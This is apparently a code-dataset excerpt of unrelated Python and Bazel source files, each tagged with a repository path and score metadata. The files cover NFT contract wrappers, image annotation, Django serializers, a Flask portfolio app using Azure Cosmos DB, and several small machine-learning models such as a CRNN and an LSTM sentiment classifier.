from_address, to_address, args.token_id, args.amount, "", self.get_transact_opts()
))
def set_royalty_bps(self, amount: int):
"""
:param amount: The amount of BPS to set
Sets the royalty BPS
"""
self.execute_tx(self.__abi_module.set_royalty_bps.build_transaction(
amount, self.get_transact_opts()
))
def get_abi_module(self) -> NFTBundle:
"""
:return: The ABI module
Returns the ABI module
"""
return self.__abi_module
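# Illustrative sketch (not part of the original module): a hedged example of
# reading bundle state. The RPC endpoint and module address below are
# placeholders, and BundleMetadata is assumed to expose the `id` and `supply`
# attributes it is constructed with above.
def _example_bundle_read():
    from thirdweb_web3 import Web3
    client = Web3(Web3.HTTPProvider("https://rpc.example.invalid"))  # placeholder endpoint
    module = BundleModule("0x0000000000000000000000000000000000000000", client)
    # Map every bundle id tracked by the contract to its total supply
    return {bundle.id: bundle.supply for bundle in module.get_all()}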
| 2.34375 | 2 |
src/kep.py | Nyhilo/kep | 0 | 12789327 | # Module imports
from sys import argv as args
from datetime import datetime
# Local imports
# Parsing objects
class file:
_date_format = "%Y-%m-%d %H:%M:%S"
    def __init__(self, title,
                 date_created=None,
                 date_modified=None,
                 tags=[],
                 files=[]):
self.title = title
self.date_created = date_created
self.date_modified = date_modified
self.tags = tags
self.files = files
    def get_default_header(self):
        header = ""
        if self.title:
            header += f"Title: {self.title}\n"
        if self.date_created is not None:
            d = self.date_created.strftime(self._date_format)
            header += f"Date Created: {d}\n"
        if self.date_modified is not None:
            d = self.date_modified.strftime(self._date_format)
            header += f"Date Modified: {d}\n"
        if len(self.tags) > 0:
            t = " ".join(self.tags)
            header += f"Tags: {t}\n"
        if len(self.files) > 0:
            t = " ".join(self.files)
            header += f"Files: {t}\n"
        header += "-----\n\n"
        return header
class Kep:
@classmethod
def list(self, subfolder="./"):
pass
@classmethod
def open(self, assetname, location):
pass
@classmethod
def read(self, location, assetname=None):
if assetname is None:
assetname = location.split('/')[-1]
            location = '/'.join(location.split('/')[:-1])
if __name__ == '__main__':
    # Equivalent to `kep list`
    if len(args) == 1:
        Kep.list()
    # Single argument tasks
    elif len(args) == 2:
        if args[1].lower() == "list":
            Kep.list()
        #...
        else:
            # Defaults to kep open args[1] ./
            Kep.open(args[1], "./")
    # Two argument tasks
    elif len(args) == 3:
        # Built-in tasks
        if args[1].lower() == "list":
            Kep.list(args[2])
        elif args[1].lower() == "read":
            Kep.read(args[2])
        #...
        else:
            # Default to kep open args[1] args[2]
            Kep.open(args[1], args[2])
| 3 | 3 |
pluginsmanager/model/system/system_effect_builder.py | SpotlightKid/PluginsManager | 9 | 12789328 |
# Copyright 2017 SrMouraSilva
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pluginsmanager.model.system.system_effect import SystemEffect
class SystemEffectBuilder(object):
"""
Automatic system physical ports detection.
Maybe the midi ports not will recognize. In these cases,
you need to start `a2jmidid`_ to get MIDI-ALSA ports automatically
mapped to JACK-MIDI ports.
.. _a2jmidid: http://manual.ardour.org/setting-up-your-system/setting-up-midi/midi-on-linux/
:param JackClient jack_client: :class:`.JackClient` instance that will get the information to
generate :class:`.SystemEffect`
"""
def __init__(self, jack_client):
self.client = jack_client
def build(self):
inputs = (port.shortname for port in self.client.audio_inputs)
outputs = (port.shortname for port in self.client.audio_outputs)
midi_inputs = (port.shortname for port in self.client.midi_inputs)
midi_outputs = (port.shortname for port in self.client.midi_outputs)
return SystemEffect('system', outputs, inputs, midi_outputs, midi_inputs)
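# Illustrative sketch (not part of the original module): given an already
# constructed JackClient (its import path is intentionally not assumed here),
# building the SystemEffect is a one-liner.
def _example_build_system_effect(jack_client):
    sys_effect = SystemEffectBuilder(jack_client).build()
    # sys_effect now mirrors the detected physical audio and MIDI ports
    return sys_effect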
| 2.09375 | 2 |
omnipack/image/image_annotator.py | FrankLeeeee/powerpack | 0 | 12789329 | from PIL import Image, ImageDraw, ImageFont
class ImageAnnotator(object):
def __init__(self,
img_path: str,
font: str = None,
font_size: int = 5):
assert isinstance(img_path, str)
self._img = Image.open(img_path).convert('RGBA')
self._img_draw = ImageDraw.Draw(self._img)
if font is None:
self._font = None
else:
assert isinstance(font, str)
self._font = ImageFont.truetype(font, font_size)
def image(self):
return self._img.convert('RGB')
def save(self, img_path):
self._img.convert('RGB').save(img_path)
def draw_line(self,
points: list,
fill: str = None,
width: int = 1):
"""
Draw a line on image
"""
assert isinstance(points, (list, tuple)) and len(points) == 2
for pair in points:
assert isinstance(pair, tuple) and len(pair) == 2
self._img_draw.line(points, fill, width)
def draw_rectangle(self,
points: list,
outline: str = None,
width: int = 1,
text: str = None,
text_fill: str = None):
"""
Draw detection bounding box with text
"""
assert isinstance(points, (list, tuple))
assert len(points) == 2 or len(points) == 4
for pair in points:
assert len(pair) == 2
if len(points) == 4:
points = [points[0], points[2]]
self._img_draw.rectangle(points, outline=outline, width=width)
if text is not None:
assert isinstance(text, str)
text_points = (points[0][0], points[1][1])
self.draw_text(points=text_points,
text=text,
fill=text_fill)
def draw_polygon(self,
points: list,
outline: str = None,
width: int = 1,
text: str = None,
text_fill: str = None):
"""
Draw polygon with text
"""
assert isinstance(points, (tuple, list)) and len(points) > 2
for pair in points:
assert isinstance(pair, tuple) and len(pair) == 2
for i in range(len(points)):
line_pts = (points[i], points[(i+1) % len(points)])
self.draw_line(points=line_pts,
fill=outline,
width=width
)
if text is not None:
assert isinstance(text, str)
self.draw_text(points=points[0],
text=text,
fill=text_fill)
def draw_text(self,
points: tuple,
text: str,
fill: str = None,
):
"""
Draw text on image
"""
assert isinstance(points, tuple) and len(points) == 2
self._img_draw.text(points, text, font=self._font, fill=fill)
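# Illustrative sketch (not part of the original module): annotate an image and
# save the result. The file names, colours and coordinates are placeholders.
def _example_annotate(src_path="input.jpg", dst_path="annotated.jpg"):
    annotator = ImageAnnotator(src_path)
    # Draw a labelled bounding box given two corner points
    annotator.draw_rectangle(points=[(10, 10), (120, 80)],
                             outline="red",
                             width=2,
                             text="object",
                             text_fill="red")
    annotator.save(dst_path)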
| 3.234375 | 3 |
library/tests/test_fx.py | pimoroni/plasma | 9 | 12789330 | import pytest
def test_fx_cycle(argv, GPIO):
"""Test that set_sequence supports the output of a PlasmaFX Sequence"""
from plasma import auto
from plasma.apa102 import PlasmaAPA102
from plasmafx import Sequence
from plasmafx.plugins import FXCycle
sequence = Sequence(10)
sequence.set_plugin(0, FXCycle())
plasma = auto("APA102:14:15:pixel_count=10")
plasma.set_sequence(sequence.get_pixels())
assert isinstance(plasma, PlasmaAPA102) | 2.0625 | 2 |
meeting/serializers.py | ttppren-github/MeetingSample-Backend | 7 | 12789331 | from rest_framework import serializers
from meeting.models import Meeting
class BaseSerializer(serializers.Serializer):
def create(self, validated_data):
pass
def update(self, instance, validated_data):
pass
class NewMeetingIn(BaseSerializer):
name = serializers.CharField(max_length=128)
begin_at = serializers.DateTimeField()
end_at = serializers.DateTimeField()
mute_type = serializers.ChoiceField(choices=Meeting.MuteType.choices, required=False)
password = serializers.CharField(required=False)
class NewMeetingOut(serializers.ModelSerializer):
number = serializers.SerializerMethodField()
class Meta:
model = Meeting
fields = ('number', 'created')
def get_number(self, obj):
return obj.call_number
class BaseMeetingOut(BaseSerializer):
success = serializers.BooleanField()
class MeetingInfoIn(BaseSerializer):
number = serializers.IntegerField(help_text='Call number of meeting')
class MeetingInfoOut(serializers.ModelSerializer):
owner_id = serializers.SerializerMethodField()
owner_name = serializers.SerializerMethodField()
number = serializers.SerializerMethodField()
class Meta:
model = Meeting
fields = ('name', 'number', 'password', 'owner_name', 'owner_id', 'status', 'begin_at', 'end_at')
def get_owner_name(self, obj):
if obj.owner is None:
return None
return obj.owner.username
def get_owner_id(self, obj):
if obj.owner is None:
return None
return obj.owner.id
def get_number(self, obj):
return obj.call_number
class MeetingListIn(BaseSerializer):
beginAt = serializers.DateTimeField(required=False, help_text='Time with zone, etc: 2021-08-12T07:56:41+08:00')
endAt = serializers.DateTimeField(required=False)
class DelMeetingIn(BaseSerializer):
meetings = serializers.ListField(child=serializers.IntegerField(), help_text="list of meeting' number to delete")
class JoinMeetingIn(BaseSerializer):
number = serializers.IntegerField()
password = serializers.CharField(required=False)
class MeetingIn(BaseSerializer):
number = serializers.IntegerField()
class JoinMeetingOut(BaseSerializer):
token = serializers.CharField()
app_key = serializers.CharField()
room_id = serializers.IntegerField()
share_user_id = serializers.IntegerField()
share_user_token = serializers.CharField()
is_breakout = serializers.BooleanField(default=False)
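# Illustrative sketch (not part of the original module): how the input
# serializers above might be exercised in a view or test. The meeting number
# and password are made-up values.
def _example_join_meeting_validation():
    serializer = JoinMeetingIn(data={'number': 123456, 'password': 'secret'})
    if serializer.is_valid():
        return serializer.validated_data  # e.g. {'number': 123456, 'password': 'secret'}
    return serializer.errors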
| 2.140625 | 2 |
kachery/steady_download_and_compute_hash.py | flatironinstitute/kachery | 8 | 12789332 | import string
import random
import hashlib
import os
# import requests
import urllib
from typing import Union
import time
def steady_download_and_compute_hash(url: str, algorithm: str, target_path: str) -> str:
remote = urllib.request.urlopen(url)
str0 = ''.join(random.sample(string.ascii_lowercase, 8))
path_tmp = target_path + '.tmp.' + str0
hh = getattr(hashlib, algorithm)()
with open(path_tmp, 'wb') as f:
while True:
chunk = remote.read(4096)
if not chunk:
break
hh.update(chunk)
f.write(chunk)
os.rename(path_tmp, target_path)
hash0 = hh.hexdigest()
return hash0
## somehow this was not always working -- some bits were wrong for large files!
def old_steady_download_and_compute_hash(url: str, algorithm: str, target_path: str, chunk_size: int=1024 * 1024 * 40) -> str:
response = requests.head(url)
size_bytes = int(response.headers['content-length'])
str0 = ''.join(random.sample(string.ascii_lowercase, 8))
path_tmp = target_path + '.tmp.' + str0
try:
hh = getattr(hashlib, algorithm)()
with open(path_tmp, 'wb') as f:
for ii in range(0, size_bytes, chunk_size):
jj = ii + chunk_size
if jj > size_bytes:
jj = size_bytes
headers = {
'Range': 'bytes={}-{}'.format(ii, jj - 1)
}
response = requests.get(url, headers=headers, stream=True)
for chunk in response.iter_content(chunk_size=5120):
if chunk: # filter out keep-alive new chunks
hh.update(chunk)
f.write(chunk)
os.rename(path_tmp, target_path)
hash0 = hh.hexdigest()
return hash0
except:
if os.path.exists(path_tmp):
os.remove(path_tmp)
raise
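# Illustrative sketch (not part of the original module): download a file and
# verify its hash in one call. The URL and target path are placeholders.
def _example_download(url='https://example.com/data.bin', target='/tmp/data.bin'):
    sha1 = steady_download_and_compute_hash(url, algorithm='sha1', target_path=target)
    print('downloaded to {} with sha1 {}'.format(target, sha1))
    return sha1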
| 2.640625 | 3 |
proto/def.bzl | mikedanese/rules_go | 1 | 12789333 | load("@io_bazel_rules_go//go/private:common.bzl",
"go_importpath",
)
load("@io_bazel_rules_go//go/private:mode.bzl",
"RACE_MODE",
"NORMAL_MODE",
)
load("@io_bazel_rules_go//go/private:providers.bzl",
"get_library",
"GoLibrary",
"GoEmbed",
)
load("@io_bazel_rules_go//go/private:rules/prefix.bzl",
"go_prefix_default",
)
def _go_proto_library_impl(ctx):
go_proto_toolchain = ctx.toolchains[ctx.attr._toolchain]
importpath = go_importpath(ctx)
go_srcs = go_proto_toolchain.compile(ctx,
proto_toolchain = ctx.toolchains["@io_bazel_rules_go//proto:proto"],
go_proto_toolchain = go_proto_toolchain,
lib = ctx.attr.proto,
importpath = importpath,
)
go_toolchain = ctx.toolchains["@io_bazel_rules_go//go:toolchain"]
golib, goembed = go_toolchain.actions.library(ctx,
go_toolchain = go_toolchain,
srcs = go_srcs,
deps = ctx.attr.deps + go_proto_toolchain.deps,
embed = ctx.attr.embed,
want_coverage = ctx.coverage_instrumented(),
importpath = importpath,
)
return [
golib, goembed,
DefaultInfo(
files = depset([get_library(golib, NORMAL_MODE)]),
runfiles = golib.runfiles,
),
OutputGroupInfo(
race = depset([get_library(golib, RACE_MODE)]),
),
]
go_proto_library = rule(
_go_proto_library_impl,
attrs = {
"proto": attr.label(mandatory=True, providers=["proto"]),
"deps": attr.label_list(providers = [GoLibrary]),
"importpath": attr.string(),
"embed": attr.label_list(providers = [GoEmbed]),
"gc_goopts": attr.string_list(),
"_go_prefix": attr.label(default = go_prefix_default),
"_go_toolchain_flags": attr.label(default=Label("@io_bazel_rules_go//go/private:go_toolchain_flags")),
"_toolchain": attr.string(default = "@io_bazel_rules_go//proto:go_proto"),
},
toolchains = [
"@io_bazel_rules_go//go:toolchain",
"@io_bazel_rules_go//proto:proto",
"@io_bazel_rules_go//proto:go_proto",
],
)
"""
go_proto_library is a rule that takes a proto_library (in the proto
attribute) and produces a go library for it.
"""
go_grpc_library = rule(
_go_proto_library_impl,
attrs = {
"proto": attr.label(mandatory=True, providers=["proto"]),
"deps": attr.label_list(providers = [GoLibrary]),
"importpath": attr.string(),
"embed": attr.label_list(providers = [GoEmbed]),
"gc_goopts": attr.string_list(),
"_go_prefix": attr.label(default = go_prefix_default),
"_toolchain": attr.string(default = "@io_bazel_rules_go//proto:go_grpc"),
"_go_toolchain_flags": attr.label(default=Label("@io_bazel_rules_go//go/private:go_toolchain_flags")),
},
toolchains = [
"@io_bazel_rules_go//go:toolchain",
"@io_bazel_rules_go//proto:proto",
"@io_bazel_rules_go//proto:go_grpc",
],
)
"""
go_grpc_library is a rule that takes a proto_library (in the proto
attribute) and produces a go library that includes grpc services for it.
"""
def proto_register_toolchains():
native.register_toolchains(
"@io_bazel_rules_go//proto:proto",
"@io_bazel_rules_go//proto:go_proto",
"@io_bazel_rules_go//proto:go_grpc",
)
| 1.6875 | 2 |
miyu_bot/commands/docs/documentation_fluent_localization.py | qwewqa/miyu-bot | 11 | 12789334 | from fluent.runtime import FluentLocalization
class DocumentationFluentLocalization(FluentLocalization):
def format_value(self, msg_id, args=None, fallback=None):
for bundle in self._bundles():
if not bundle.has_message(msg_id):
continue
msg = bundle.get_message(msg_id)
if not msg.value:
continue
val, errors = bundle.format_pattern(msg.value, args)
return val
return fallback if fallback is not None else msg_id
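# Illustrative sketch (not part of the original module): the override above
# behaves like FluentLocalization.format_value, except that the supplied
# fallback string is returned when no bundle defines the message id.
def _example_format(localization: DocumentationFluentLocalization) -> str:
    return localization.format_value('missing-message-id', fallback='(no documentation)')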
| 2.390625 | 2 |
app.py | IndieDragoness/portfolio | 0 | 12789335 |
from flask import Flask, render_template, request, send_file
from azure.cosmos import exceptions, CosmosClient, PartitionKey
from azure.core.exceptions import ResourceExistsError
from scripts import utilities
import logging
import json
import os
# ================================== #
# _____
# / _ \ ________ __ __ _______ ____
# / /_\ \ \___ /| | \\_ __ \_/ __ \
# / | \ / / | | / | | \/\ ___/
# \____|__ //_____ \|____/ |__| \___ >
# \/ \/ \/
#
# ================================== #
# Microsoft Azure Cosmos DB Initialization
# Create Cosmos Client
endpoint = os.environ["COSMOS_DATABASE_ENDPOINT"]
key = os.environ["COSMOS_DATABASE_KEY"]
client = CosmosClient(endpoint, key)
database_name = os.environ["COSMOS_DATABASE_NAME"]
database = client.get_database_client(database_name)
container_name = os.environ["COSMOS_CONTAINER_NAME"]
container = database.get_container_client(container_name)
# ================================== #
# ___________.__ __
# \_ _____/| | _____ ______| | __
# | __) | | \__ \ / ___/| |/ /
# | \ | |__ / __ \_ \___ \ | <
# \___ / |____/(____ //____ >|__|_ \
# \/ \/ \/ \/
# ================================== #
# Static is where all of our static files are stored
app = Flask(__name__, static_url_path='/static')
# Setup Flask Logging to record events at Runtime
logging.basicConfig(filename='record.log', level=logging.DEBUG, format=f'%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')
@app.route("/")
def main():
return render_template("index.htm")
# Link to disc_drive_project.htm
@app.route('/disc_drive_project')
def disc_drive_project():
return render_template("disc_drive_project.htm")
# Link to particle_accelerator_project.htm
@app.route('/particle_accelerator_project')
def particle_accelerator_project():
return render_template("particle_accelerator_project.htm")
# Link to tensorflow_project.htm
@app.route('/tensorflow_project')
def tensorflow_project():
return render_template("tensorflow_project.htm")
# Link to unity_project.htm
@app.route('/unity_project')
def unity_project():
return render_template("unity_project.htm")
# Link to microsoft_azure_project.htm
@app.route('/microsoft_azure_project')
def microsoft_azure_project():
return render_template("microsoft_azure_project.htm")
# Link to docker_project.htm
@app.route('/docker_project')
def docker_project():
return render_template("docker_project.htm")
# Link to linux_project.htm
@app.route('/linux_project')
def linux_project():
return render_template("linux_project.htm")
# Link to linux_project.htm
@app.route('/awx_ansible_project')
def awx_ansible_project():
return render_template("awx_ansible_project.htm")
# Download my RL-PCG Paper
@app.route('/unity_project/download_rlpcg_paper', methods=['POST'])
def download_rlpcg_paper():
app.logger.info('Paper Download Detected!')
return send_file('static/documents/Teaching_RL_PCG_via_Educational_Game.pdf', as_attachment=True)
# Section correlates to the Contact Form in index.htm
@app.route('/contact_form_action', methods=['POST'])
def contact_form_action():
app.logger.info('Contact Form Submission Detected!')
# Retrieve data from HTML inputs
name = request.form['Name']
email = request.form['Email']
subject = request.form['Subject']
message = request.form['Message']
# Log data entered
app.logger.info('Name: ' + name)
app.logger.info('Email: ' + email)
app.logger.info('Subject: ' + subject)
app.logger.info('Message: ' + message)
# Post data to Contact_Form container in Microsoft Azure Cosmos DB
try: # Try to create a new entry with given data
app.logger.info('Checking if email is already present in database...')
# Portfolio Section is the Partition Key for the Portfolio Container (used for point reads and writes)
new_entry = {'id': email, 'name': name, 'message': subject + ": " + message, 'portfolio_section': "contact_form"}
container.create_item(new_entry)
app.logger.info('Email not present! Created new database entry successfully: ' + email)
except ResourceExistsError: # Add to existing entry if unable to create a new one
app.logger.info('Email already present in database. Adding new message to existing entry: ' + email)
# Get the current entry in the database for this email and add this new message
properties = container.read()
app.logger.info(properties)
items = container.read_all_items()
app.logger.info(items)
item = container.read_item(email, partition_key="contact_form")
app.logger.info('Acquired item.\n{}'.format(item))
# Get the number of keys containing "message" substring
message_count = utilities.count_string_in_dictionary_keys(str_value="message", dict_value=item)
app.logger.info('This is the {} message for this id.'.format(message_count))
item["message{}".format(message_count)] = subject + ": " + message
updated_item = container.upsert_item(item)
# Scroll the page down to the Contact Form, after Submit is pressed, and say 'Thank you!'
return render_template("/index.htm", submit_button_pressed="contact") | 2.078125 | 2 |
numpy_practice/a2_arrays.py | dkp-1024/my_machine_learning | 0 | 12789336 |
import numpy as np
#creating arrays
array = np.zeros(10, dtype='int')
# array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
# print(array)
#creating a 3 row x 5 column matrix
array = np.ones((3,5), dtype=float)
# array([[ 1., 1., 1., 1., 1.],
# [ 1., 1., 1., 1., 1.],
# [ 1., 1., 1., 1., 1.]])
# print(array)
#creating a matrix with a predefined value
array = np.full((3,5),1.23)
# array([[ 1.23, 1.23, 1.23, 1.23, 1.23],
# [ 1.23, 1.23, 1.23, 1.23, 1.23],
# [ 1.23, 1.23, 1.23, 1.23, 1.23]])
# print(array)
#create an array with a set sequence
array = np.arange(0, 20, 2)
# array([0, 2, 4, 6, 8,10,12,14,16,18])
# print(array)
#create an array of even space between the given range of values
array = np.linspace(0, 1, 5)
# array([ 0., 0.25, 0.5 , 0.75, 1.])
# print(array)
#create a 3x3 array with mean 0 and standard deviation 1 in a given dimension
array = np.random.normal(0, 1, (3,3))
# array([[ 0.72432142, -0.90024075, 0.27363808],
# [ 0.88426129, 1.45096856, -1.03547109],
# [-0.42930994, -1.02284441, -1.59753603]])
# print(array)
#create an identity matrix
array = np.eye(3)
# array([[ 1., 0., 0.],
# [ 0., 1., 0.],
# [ 0., 0., 1.]])
#set a random seed
np.random.seed(0)
x1 = np.random.randint(10, size=6) #one dimension
x2 = np.random.randint(10, size=(3,4)) #two dimension
x3 = np.random.randint(10, size=(3,4,5)) #three dimension
print("x3 ndim:", x3.ndim)
print("x3 shape:", x3.shape)
print("x3 size: ", x3.size)
# ('x3 ndim:', 3)
# ('x3 shape:', (3, 4, 5))
# ('x3 size: ', 60)
# ..............................................................................
# print the results at any level
print(array) | 3.125 | 3 |
src/DeepMatter/VAE_PFM/__init__.py | m3-learning/DeepMatter | 2 | 12789337 | """
"""
from . import core
from . import file
from . import machine_learning
from . import dictionary_learning | 0.972656 | 1 |
random_forest_regression.py | manuelmusngi/machine_learning_algorithms_for_development | 1 | 12789338 |
# Random Forest Regression
# Import the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Import the dataset
dataset = pd.read_csv('')
X = dataset.iloc[:, 1:-1].values
y = dataset.iloc[:, -1].values
# Train the Random Forest Regression model on the dataset
from sklearn.ensemble import RandomForestRegressor
regressor = RandomForestRegressor(n_estimators = 10, random_state = 0)
regressor.fit(X, y)
# Predict a new result
regressor.predict([[6.5]])
# Visualize the Random Forest Regression results
X_grid = np.arange(min(X), max(X), 0.01)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color = 'red')
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.title('')
plt.xlabel('')
plt.ylabel('')
plt.show()
| 3.46875 | 3 |
moosetools/__init__.py | NidorFanClub/oatcogs | 1 | 12789339 | from .moosetools import MooseTools
def setup(bot):
bot.add_cog(MooseTools())
| 1.46875 | 1 |
models/crnn.py | VanillaBrooks/Splitr | 1 | 12789340 | import sys
sys.path.insert(0, r'C:\Users\Brooks\github\splitr')# access library code from outside /models
# library functions:
import torch
import time
import pandas as pd
# Splitr modules:
import model_utils
# this is really a constructor for a bidirectional LSTM but i figured
# BD_LSTM was only 2 letters off of BDSM so why not
class BDSM(torch.nn.Module):
def __init__(self, num_inputs, num_hidden_layers,char_in, char_out, layer_count=1):
super(BDSM, self).__init__()
self.char_out = char_out
# make the last layer not have a linear layer inside
self.rnn = torch.nn.LSTM(num_inputs, num_hidden_layers, num_layers=layer_count, bidirectional=True, batch_first=True)
self.linear = torch.nn.Linear(char_in, char_out)
self.relu = torch.nn.ReLU()
def forward(self, x):
# print('>>starting rnn that has output chars of', x.shape)
rnn_output, _ = self.rnn(x)
# print('raw rnn out', rnn_output.shape)
batch, char_count, depth = rnn_output.shape
rnn_output = rnn_output.contiguous().view(batch*depth, char_count)
# print('reshaped rnn out', rnn_output.shape)
linear = self.linear(rnn_output)
output = linear.view(batch, self.char_out, depth)
# print('after linear shape', output.shape)
output =self.relu(output)
return output
# Convolution cell with adjustable activation / maxpool size / batchnorm
class CNN_cell(torch.nn.Module):
def __init__(self,in_channels=False,out_channels=False,kernel_size=3,activation=False, pool_shape=False, pool_stride=False, batchnorm=False):
super(CNN_cell, self).__init__()
_layers = []
if in_channels and out_channels:
_layers.append(torch.nn.Conv2d(in_channels, out_channels,kernel_size))
if activation:
_layers.append(self.find_activation(activation))
if batchnorm:
_layers.append(torch.nn.BatchNorm2d(batchnorm))
if pool_shape and pool_stride:
_layers.append(torch.nn.MaxPool2d(pool_shape, pool_stride))
self.cnn = torch.nn.Sequential(*_layers)
def find_activation(self, activation):
if activation == 'relu':
return torch.nn.ReLU()
elif activation == 'tanh':
return torch.nn.Tanh()
elif activation == 'leaky':
return torch.nn.LeakyReLU()
else:
print('activation function call |%s| is not configured' % activation )
def forward(self, input_tensor):
output = self.cnn(input_tensor)
return output
# https://arxiv.org/pdf/1507.05717.pdf
class model(torch.nn.Module):
def __init__(self, channel_count=1,num_hidden= 256, unique_char_count=57,rnn_layer_stack=1):
super(model, self).__init__()
# add dropout to cnn layers
self.softmax = torch.nn.LogSoftmax(dim=2)
# CONVOLUTIONS
_cnn_layer = []
_cnn_layer.append(CNN_cell(in_channels=1, out_channels=64, kernel_size=3, activation='relu', pool_shape=False, pool_stride=False))
_cnn_layer.append(CNN_cell(in_channels=64 , out_channels=128, kernel_size=3, activation='relu', pool_shape=(2,2), pool_stride=2))
_cnn_layer.append(CNN_cell(in_channels=128, out_channels=256, kernel_size=3, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=256, out_channels=512, kernel_size=3, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=3, activation='relu', pool_shape=(1,2), pool_stride=2))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu', batchnorm=512))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu'))
# RNN LAYERS
_bdsm_layer = []# 2048
# _bdsm_layer.append(BDSM(num_inputs=512, num_hidden_layers=num_hidden, char_in=56,char_out=56, layer_count=rnn_layer_stack))
# _bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden, char_in=85,char_out=140, layer_count=1))
# _bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden,char_in= 140, char_out=190, layer_count=1))
# _bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden,char_in= 190, char_out=250, layer_count=1))
# _bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden,char_in= 250, char_out=350, layer_count=1))
inc = 1.26
max_len = 80
current = 53
p = 0
while current < max_len:
p+=1
prev = current
current = int(inc * prev)
print(prev, current)
_bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden,char_in= prev, char_out=current, layer_count=1))
print('number of rnns stacked %s' % p)
# CHAR activations (transcription)
self.linear = torch.nn.Sequential(
torch.nn.Linear(in_features=num_hidden*2, out_features=unique_char_count),torch.nn.ReLU())
self.cnn = torch.nn.Sequential(*_cnn_layer)
self.rnn = torch.nn.Sequential(*_bdsm_layer)
def forward(self, x):
t = self.cnn(x)
batch, depth, height, base = t.shape
# print('raw cnn shape: ', t.shape)
# import sys
# cnn_output = t.view(batch, height, depth*base)
cnn_output = t.view(batch, base, height*depth)
# print(' NEW after reshape', cnn_output.shape, type(cnn_output))
# sys.exit('exits')
rnn_output = self.rnn(cnn_output)
batch, char_len, depth = rnn_output.shape
rnn_output = rnn_output.contiguous().view(batch*char_len, depth)
# print('rnn output ', rnn_output.shape)
output = self.linear(rnn_output).view(batch, char_len, -1)
output = self.softmax(output)
return output
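# Illustrative smoke test (not part of the original file): build the network
# with its default arguments and count trainable parameters, without running a
# forward pass (the expected input width depends on the CNN stack above).
def _example_parameter_count():
    crnn = model()
    return sum(p.numel() for p in crnn.parameters() if p.requires_grad)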
| 2.921875 | 3 |
test/vertex_cover_gen.py | s17k/VertexCover | 0 | 12789341 |
import random
n = random.randint(2,3)  # n >= 2 so that an edge with two distinct endpoints exists
m = random.randint(1, n*(n-1)//2)
print str(n) + ' ' + str(m)
for i in range(m):
a = b = 1
while a == b:
a = random.randint(1,n)
b = random.randint(1,n)
print str(a) + ' ' + str(b)
print random.randint(0,5)
| 3.09375 | 3 |
PyTorch/Resources/Examples/02_lstm_sentiment_analysis.py | methylDragon/python-data-tools-reference | 9 | 12789342 | # Modified from SUTD and https://github.com/bentrevett/pytorch-sentiment-analysis
# Sentiment Analysis on IMDB with FashionMNIST
# We're using packed sequences for training
# For more info: https://stackoverflow.com/questions/51030782/why-do-we-pack-the-sequences-in-pytorch
import torch.nn as nn
import torchtext
import torch
from torchtext.legacy import data
from torchtext.legacy import datasets
import torch.optim as optim
import random
import time
# MODEL ========================================================================
class BidirectionalLSTM(nn.Module):
def __init__(self,
input_dim,
embedding_dim=100,
hidden_dim=256,
output_dim=1,
n_layers=2,
bidirectional=True,
dropout=0.5,
pad_idx=0):
super().__init__()
self.embedding = nn.Embedding(input_dim,
embedding_dim,
padding_idx=pad_idx)
self.rnn = nn.LSTM(embedding_dim,
hidden_dim,
num_layers=n_layers,
bidirectional=bidirectional,
dropout=dropout)
self.fc = nn.Linear(hidden_dim * 2, output_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, text, text_lengths):
embedded = self.dropout(self.embedding(text)) # Map text to embedding
# Pack sequence
# Note: We move text_lengths to cpu due to a small bug
# https://github.com/pytorch/pytorch/issues/43227
packed_embedded = nn.utils.rnn.pack_padded_sequence(
embedded, text_lengths.cpu()
)
packed_output, (hidden, cell) = self.rnn(packed_embedded) # Feedforward
# Unpack sequence
output, output_lengths = nn.utils.rnn.pad_packed_sequence(packed_output)
hidden = self.dropout(torch.cat((hidden[-2,:,:],
hidden[-1,:,:]),
dim = 1))
return self.fc(hidden)
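# Illustrative sketch (not part of the original script): what packing does on a
# toy padded batch. Sequences must be sorted by decreasing length, which the
# BucketIterator below guarantees via sort_within_batch=True.
def _packed_sequence_demo():
    import torch.nn.utils.rnn as rnn_utils
    padded = torch.tensor([[[1.0], [2.0], [3.0]],
                           [[4.0], [5.0], [0.0]]])  # (batch=2, seq=3, feat=1), second row padded
    lengths = torch.tensor([3, 2])
    packed = rnn_utils.pack_padded_sequence(padded, lengths, batch_first=True)
    # packed.data keeps only the real timesteps: 5 rows instead of 6
    unpacked, unpacked_lengths = rnn_utils.pad_packed_sequence(packed, batch_first=True)
    return packed.data.shape[0], unpacked.shape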
# TRAINING UTILITIES ===========================================================
def binary_accuracy(preds, y):
"""
Returns accuracy per batch, i.e. if you get 8/10 right, this returns 0.8, NOT 8
"""
# Round predictions to the closest integer
rounded_preds = torch.round(torch.sigmoid(preds))
correct = (rounded_preds == y).float() #convert into float for division
acc = correct.sum() / len(correct)
return acc
def train(model, iterator, optimizer, criterion):
epoch_loss, epoch_acc = 0, 0
model.train() # Set to training mode
for batch in iterator:
